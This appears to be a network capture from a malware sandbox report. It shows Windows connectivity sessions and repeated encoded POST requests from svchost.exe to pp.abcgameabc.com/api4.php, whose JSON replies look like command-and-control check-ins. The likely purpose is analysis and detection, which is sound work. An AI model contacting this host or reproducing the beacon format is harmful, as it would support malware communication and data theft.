                                                          2022-09-11 08:17:06 UTC625OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 32 32 31 63 34 34 62 65 33 34 33 31 64 61 61 0d 0a 0d 0a
                                                          Data Ascii: CNT 1 CON 246Context: 5221c44be3431daa
                                                          2022-09-11 08:17:06 UTC625OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                          2022-09-11 08:17:06 UTC625OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 32 32 31 63 34 34 62 65 33 34 33 31 64 61 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 47 62 78 49 64 63 6d 72 7a 37 53 70 4d 4b 32 31 51 41 42 43 30 78 4c 73 62 61 79 36 75 6a 53 34 43 31 64 48 2f 4d 73 53 2b 70 6d 35 55 30 45 35 58 7a 65 4d 53 6f 43 30 2b 50 64 64 76 70 39 31 49 37 6c 50 35 68 71 6c 64 51 4e 69 75 46 54 7a 6d 46 58 6e 42 6a 64 62 5a 53 64 4c 56 55 34 72 41 44 58 6e 30 76 30 55 4d 57 79 77 2b 48 53 71 55 72 37 6d 58 4b 6a 66 51 76 69 6e 46 62 4e 59 78 69 76 4e 42 4b 6b
                                                          Data Ascii: ATH 2 CON\DEVICE 1014Context: 5221c44be3431daa<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXGbxIdcmrz7SpMK21QABC0xLsbay6ujS4C1dH/MsS+pm5U0E5XzeMSoC0+Pddvp91I7lP5hqldQNiuFTzmFXnBjdbZSdLVU4rADXn0v0UMWyw+HSqUr7mXKjfQvinFbNYxivNBKk
                                                          2022-09-11 08:17:06 UTC626OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 32 32 31 63 34 34 62 65 33 34 33 31 64 61 61 0d 0a 0d 0a
                                                          Data Ascii: BND 3 CON\QOS 29Context: 5221c44be3431daa
                                                          2022-09-11 08:17:06 UTC626INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                          Data Ascii: 202 1 CON 58
                                                          2022-09-11 08:17:06 UTC626INData Raw: 4d 53 2d 43 56 3a 20 6c 6c 37 77 47 31 50 46 56 30 61 68 51 61 73 44 70 34 57 78 64 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                          Data Ascii: MS-CV: ll7wG1PFV0ahQasDp4WxdA.0Payload parsing failed.


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3192.168.2.34973920.199.120.151443C:\Windows\System32\svchost.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-09-11 08:17:14 UTC626OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 61 62 66 64 63 35 63 30 37 37 32 38 63 35 36 0d 0a 0d 0a
                                                          Data Ascii: CNT 1 CON 246Context: fabfdc5c07728c56
                                                          2022-09-11 08:17:14 UTC626OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                          2022-09-11 08:17:14 UTC626OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 61 62 66 64 63 35 63 30 37 37 32 38 63 35 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 47 62 78 49 64 63 6d 72 7a 37 53 70 4d 4b 32 31 51 41 42 43 30 78 4c 73 62 61 79 36 75 6a 53 34 43 31 64 48 2f 4d 73 53 2b 70 6d 35 55 30 45 35 58 7a 65 4d 53 6f 43 30 2b 50 64 64 76 70 39 31 49 37 6c 50 35 68 71 6c 64 51 4e 69 75 46 54 7a 6d 46 58 6e 42 6a 64 62 5a 53 64 4c 56 55 34 72 41 44 58 6e 30 76 30 55 4d 57 79 77 2b 48 53 71 55 72 37 6d 58 4b 6a 66 51 76 69 6e 46 62 4e 59 78 69 76 4e 42 4b 6b
                                                          Data Ascii: ATH 2 CON\DEVICE 1014Context: fabfdc5c07728c56<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXGbxIdcmrz7SpMK21QABC0xLsbay6ujS4C1dH/MsS+pm5U0E5XzeMSoC0+Pddvp91I7lP5hqldQNiuFTzmFXnBjdbZSdLVU4rADXn0v0UMWyw+HSqUr7mXKjfQvinFbNYxivNBKk
                                                          2022-09-11 08:17:14 UTC627OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 61 62 66 64 63 35 63 30 37 37 32 38 63 35 36 0d 0a 0d 0a
                                                          Data Ascii: BND 3 CON\QOS 29Context: fabfdc5c07728c56
                                                          2022-09-11 08:17:15 UTC628INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                          Data Ascii: 202 1 CON 58
                                                          2022-09-11 08:17:15 UTC628INData Raw: 4d 53 2d 43 56 3a 20 37 4e 65 39 4a 36 52 6a 6f 6b 65 6b 41 2f 4e 64 4f 74 51 68 35 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                          Data Ascii: MS-CV: 7Ne9J6RjokekA/NdOtQh5A.0Payload parsing failed.


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          4192.168.2.34974320.199.120.151443C:\Windows\System32\svchost.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-09-11 08:17:30 UTC628OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 38 38 37 37 33 62 39 61 38 34 65 30 34 66 39 0d 0a 0d 0a
                                                          Data Ascii: CNT 1 CON 246Context: 188773b9a84e04f9
                                                          2022-09-11 08:17:30 UTC628OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                          2022-09-11 08:17:30 UTC628OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 38 38 37 37 33 62 39 61 38 34 65 30 34 66 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 47 62 78 49 64 63 6d 72 7a 37 53 70 4d 4b 32 31 51 41 42 43 30 78 4c 73 62 61 79 36 75 6a 53 34 43 31 64 48 2f 4d 73 53 2b 70 6d 35 55 30 45 35 58 7a 65 4d 53 6f 43 30 2b 50 64 64 76 70 39 31 49 37 6c 50 35 68 71 6c 64 51 4e 69 75 46 54 7a 6d 46 58 6e 42 6a 64 62 5a 53 64 4c 56 55 34 72 41 44 58 6e 30 76 30 55 4d 57 79 77 2b 48 53 71 55 72 37 6d 58 4b 6a 66 51 76 69 6e 46 62 4e 59 78 69 76 4e 42 4b 6b
                                                          Data Ascii: ATH 2 CON\DEVICE 1014Context: 188773b9a84e04f9<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXGbxIdcmrz7SpMK21QABC0xLsbay6ujS4C1dH/MsS+pm5U0E5XzeMSoC0+Pddvp91I7lP5hqldQNiuFTzmFXnBjdbZSdLVU4rADXn0v0UMWyw+HSqUr7mXKjfQvinFbNYxivNBKk
                                                          2022-09-11 08:17:30 UTC629OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 38 38 37 37 33 62 39 61 38 34 65 30 34 66 39 0d 0a 0d 0a
                                                          Data Ascii: BND 3 CON\QOS 29Context: 188773b9a84e04f9
                                                          2022-09-11 08:17:30 UTC629INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                          Data Ascii: 202 1 CON 58
                                                          2022-09-11 08:17:30 UTC629INData Raw: 4d 53 2d 43 56 3a 20 76 37 53 6d 4e 66 79 35 6f 30 69 4a 39 31 56 42 33 72 33 54 55 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                          Data Ascii: MS-CV: v7SmNfy5o0iJ91VB3r3TUQ.0Payload parsing failed.


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          5192.168.2.349757104.21.34.132443C:\Windows\System32\svchost.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-09-11 08:17:43 UTC629OUTPOST /api4.php HTTP/1.1
                                                          Accept: */*
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                          Host: pp.abcgameabc.com
                                                          Content-Length: 274
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2022-09-11 08:17:43 UTC629OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 66 31 39 65 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 61 47 6c 6d 56 74 61 58 75 57 70 74 36 6b 70 70 6d 31 74 62 57 31 70 71 43 6b 70 6d 6c 6f 5a 32 68 37 70 74 36 6b 31 35 4f 67 70 4b 5a 76 6c 4b 62 65 70 4b 62 63 71 4b 4c 58 72 61 4b 72 31 71 4b 6f 71 61 61 67 70 4b 5a 6a 5a 33 6c 73 62 32 4a 37 62 33 69 6d 33 71 53 6d 71 39 79 61 31 39 24 58 72 59 65 74 68 71 71 6f 68 74 65 48 68 39 66 58 71 49 65 61 6d 4e 62 66 72 64 65 59 6d 39 40 70 33 39 79 6d 6f 4b 53 6d 59 32 70 37 6c 71 62 65 70 4b 62 66 6f 74 40 6d 6f 4b 53 6d 6c 6e 74 39 62 32 56 69 70 74 36 6b 70 72 36 4d 70 71 43 6b 70 6d 69 66 6c 48 75 6d 33
                                                          Data Ascii: p=kaZ5bGdiYntgb3im3qTf19egpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuWpt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbcqKLXraKr1qKoqaagpKZjZ3lsb2J7b3im3qSmq9ya19$XrYethqqohteHh9fXqIeamNbfrdeYm9@p39ymoKSmY2p7lqbepKbfot@moKSmlnt9b2Vipt6kpr6MpqCkpmiflHum3
                                                          2022-09-11 08:17:44 UTC630INHTTP/1.1 200 OK
                                                          Date: Sun, 11 Sep 2022 08:17:44 GMT
                                                          Content-Type: application/json; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ny6WZiH%2BJwENc5P%2B94Y%2FhH2yCHfhlzGOo3Xd467%2BnZ0Ja6QySDkt18e8J%2FC1yOQ9MTX0VwXWaMALHbRSXx14aLc%2BrrCEcp05Wqt2BJRfGYK5kWqXevVt4aety5q9LzYi%2B5%2FAmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 748ef7f70ba69229-FRA
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          2022-09-11 08:17:44 UTC630INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                          Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                          2022-09-11 08:17:44 UTC630INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          6192.168.2.349758104.21.34.132443C:\Windows\System32\svchost.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-09-11 08:17:44 UTC630OUTPOST /api4.php HTTP/1.1
                                                          Accept: */*
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                          Host: pp.abcgameabc.com
                                                          Content-Length: 274
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2022-09-11 08:17:44 UTC631OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 66 31 39 65 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 61 47 6c 6d 56 74 61 58 75 57 70 74 36 6b 70 70 6d 31 74 62 57 31 70 71 43 6b 70 6d 6c 6f 5a 32 68 37 70 74 36 6b 31 35 4f 67 70 4b 5a 76 6c 4b 62 65 70 4b 62 63 71 4b 4c 58 72 61 4b 72 31 71 4b 6f 71 61 61 67 70 4b 5a 6a 5a 33 6c 73 62 32 4a 37 62 33 69 6d 33 71 53 6d 71 39 79 61 31 39 24 58 72 59 65 74 68 71 71 6f 68 74 65 48 68 39 66 58 71 49 65 61 6d 4e 62 66 72 64 65 59 6d 39 40 70 33 39 79 6d 6f 4b 53 6d 59 32 70 37 6c 71 62 65 70 4b 62 66 6f 74 40 6d 6f 4b 53 6d 6c 6e 74 39 62 32 56 69 70 74 36 6b 70 72 36 4d 70 71 43 6b 70 6d 69 66 6c 48 75 6d 33
                                                          Data Ascii: p=kaZ5bGdiYntgb3im3qTf19egpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuWpt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbcqKLXraKr1qKoqaagpKZjZ3lsb2J7b3im3qSmq9ya19$XrYethqqohteHh9fXqIeamNbfrdeYm9@p39ymoKSmY2p7lqbepKbfot@moKSmlnt9b2Vipt6kpr6MpqCkpmiflHum3
                                                          2022-09-11 08:17:44 UTC631INHTTP/1.1 200 OK
                                                          Date: Sun, 11 Sep 2022 08:17:44 GMT
                                                          Content-Type: application/json; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NJglRmnvOwqBdlLeq10ruAt0O64K0dX33UdoEyNq1FdNjnhD5cjM7IWNreMT%2BDLLyAOnBCMI7zF0QGDQ8htzjMi3Xq7z%2FggagRb7H2VOu%2BT%2F%2B2OoIoklGqsepGFXyfwb1KBC5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 748ef7fb3eb1bc01-FRA
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          2022-09-11 08:17:44 UTC631INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                          Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                          2022-09-11 08:17:44 UTC631INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          7192.168.2.349759104.21.34.132443C:\Windows\System32\svchost.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-09-11 08:17:46 UTC631OUTPOST /api4.php HTTP/1.1
                                                          Accept: */*
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                          Host: pp.abcgameabc.com
                                                          Content-Length: 1590
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2022-09-11 08:17:46 UTC632OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 66 31 39 65 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 73 5a 47 6d 68 70 5a 6c 62 57 6c 37 6c 71 62 65 70 4b 61 5a 62 4a 5a 6c 59 33 75 6d 6f 4b 53 6d 6d 57 56 6c 59 57 39 37 61 61 62 65 70 4b 61 50 6d 4a 76 54 68 34 79 4e 6c 34 69 4c 59 5a 35 75 61 58 6d 24 76 71 76 57 67 6f 65 24 33 47 4c 55 65 59 6a 66 71 32 35 76 62 6f 71 71 6a 64 53 66 61 34 4f 71 67 6d 32 61 33 49 32 4e 74 32 57 47 6c 70 68 35 68 36 4f 66 6e 4c 53 30 6d 57 35 74 6a 59 78 6f 69 6f 68 34 69 39 47 6b 70 71 43 6b 70 6d 78 6c 61 57 69 6d 33 71 53 6d 6f 6e 68 6c 61 32 5a 67 65 33 6c 67 62 33 6c 68 6f 6d 4a 37 61 4b 61 54 6f 4b 53 52 70 6f 61 57 5a
                                                          Data Ascii: p=kaZ5bGdiYntgb3im3qTf19egpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6ksZGmhpZlbWl7lqbepKaZbJZlY3umoKSmmWVlYW97aabepKaPmJvTh4yNl4iLYZ5uaXm$vqvWgoe$3GLUeYjfq25vboqqjdSfa4Oqgm2a3I2Nt2WGlph5h6OfnLS0mW5tjYxoioh4i9GkpqCkpmxlaWim3qSmonhla2Zge3lgb3lhomJ7aKaToKSRpoaWZ
                                                          2022-09-11 08:17:46 UTC633INHTTP/1.1 200 OK
                                                          Date: Sun, 11 Sep 2022 08:17:46 GMT
                                                          Content-Type: application/json; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LNfaDO9g0Lv5aHCr6DVS%2Bk00kN27qipCSJ5pdkcgWmoeSI3%2Fo0IpMXA%2F%2BNAVK%2FPZQm%2BAkRSpWyG%2FtL%2FdtFt1zgV82yi%2BhpTdb76R5VF1vkxxQE9l1mquundMFPfsFXOn9Anw4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 748ef8072be99131-FRA
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          2022-09-11 08:17:46 UTC634INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                          Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                          2022-09-11 08:17:46 UTC634INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          8192.168.2.349760104.21.34.132443C:\Windows\System32\svchost.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-09-11 08:17:46 UTC634OUTPOST /api4.php HTTP/1.1
                                                          Accept: */*
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                          Host: pp.abcgameabc.com
                                                          Content-Length: 250
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2022-09-11 08:17:46 UTC634OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 66 31 39 65 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 5a 70 61 47 64 6f 65 36 62 65 70 4b 75 54 6f 4b 53 6d 62 35 53 6d 33 71 53 6d 33 4b 69 69 31 36 32 69 71 39 61 69 71 4b 6d 6d 6f 4b 53 6d 59 32 64 35 62 47 39 69 65 32 39 34 70 74 36 6b 70 71 76 63 6d 74 66 66 31 36 32 48 72 59 61 71 71 49 62 58 68 34 66 58 31 36 69 48 6d 70 6a 57 33 36 33 58 6d 4a 76 66 71 64 24 63 70 71 43 6b 70 6d 4e 71 65 35 61 6d 33 71 53 6d 33 36 4c 66 70 71 43 6b 70 70 5a 37 66 57 39 6c 59 71 62 65 70 4b 61 40 6a 4b 61 67 70 4b 5a 6f 6e 35 52 37 70 74 36 6b 71 36 43 6b 70 6d 70 37 6c 71 62 65 70 4b 6e 57 6b 77 3d 3d
                                                          Data Ascii: p=kaZ5bGdiYntgb3im3qTf19egpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaZpaGdoe6bepKuToKSmb5Sm3qSm3Kii162iq9aiqKmmoKSmY2d5bG9ie294pt6kpqvcmtff162HrYaqqIbXh4fX16iHmpjW363XmJvfqd$cpqCkpmNqe5am3qSm36LfpqCkppZ7fW9lYqbepKa@jKagpKZon5R7pt6kq6Ckpmp7lqbepKnWkw==
                                                          2022-09-11 08:17:47 UTC635INHTTP/1.1 200 OK
                                                          Date: Sun, 11 Sep 2022 08:17:47 GMT
                                                          Content-Type: application/json; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QICfrLBtkpQjbvhu%2BKEvjNUE1zU%2BH%2BBGYDpQhIZfF9nYngUxPTPGPSAHkQhto3dGlWPHmpkmRO0tibCzXIiM6eloxbn4H4yVtolPgDDk%2FZya1yQqi7%2BTrcACXOCpxujKVfZaAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 748ef80b7a28bbf2-FRA
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          2022-09-11 08:17:47 UTC635INData Raw: 34 65 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 2c 22 63 6b 22 3a 5b 5d 2c 22 69 6e 73 63 6b 22 3a 5b 5d 7d 7d 0d 0a
                                                          Data Ascii: 4e{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1,"ck":[],"insck":[]}}
                                                          2022-09-11 08:17:47 UTC635INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          9192.168.2.34976120.199.120.151443C:\Windows\System32\svchost.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-09-11 08:17:47 UTC635OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 36 37 64 35 62 37 33 35 61 35 33 33 62 32 66 0d 0a 0d 0a
                                                          Data Ascii: CNT 1 CON 246Context: 767d5b735a533b2f
